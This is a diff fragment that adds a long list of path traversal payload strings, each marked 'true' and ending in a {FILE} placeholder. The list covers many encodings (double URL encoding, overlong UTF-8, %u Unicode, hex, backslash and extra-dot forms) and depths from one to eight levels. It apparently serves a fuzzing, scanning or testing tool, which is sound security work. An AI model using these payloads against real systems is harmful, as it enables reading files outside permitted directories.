+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,\\../{FILE}",
+ "true,\\../\\../{FILE}",
+ "true,\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,/..\\{FILE}",
+ "true,/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,.../{FILE}",
+ "true,.../.../{FILE}",
+ "true,.../.../.../{FILE}",
+ "true,.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../.../{FILE}",
+ "true,...\\{FILE}",
+ "true,...\\...\\{FILE}",
+ "true,...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,..../{FILE}",
+ "true,..../..../{FILE}",
+ "true,..../..../..../{FILE}",
+ "true,..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../..../{FILE}",
+ "true,....\\{FILE}",
+ "true,....\\....\\{FILE}",
+ "true,....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,........................................................................../{FILE}",
+ "true,........................................................................../../{FILE}",
+ "true,........................................................................../../../{FILE}",
+ "true,........................................................................../../../../{FILE}",
+ "true,........................................................................../../../../../{FILE}",
+ "true,........................................................................../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../../{FILE}",
+ "true,..........................................................................\\{FILE}",
+ "true,..........................................................................\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%u2215{FILE}",
+ "true,..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,..%u2216{FILE}",
+ "true,..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uF025{FILE}",
+ "true,..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,..0x2f{FILE}",
+ "true,..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,..0x5c{FILE}",
+ "true,..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,///%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,\\\\\\%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..\\\\{FILE}",
+ "true,..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
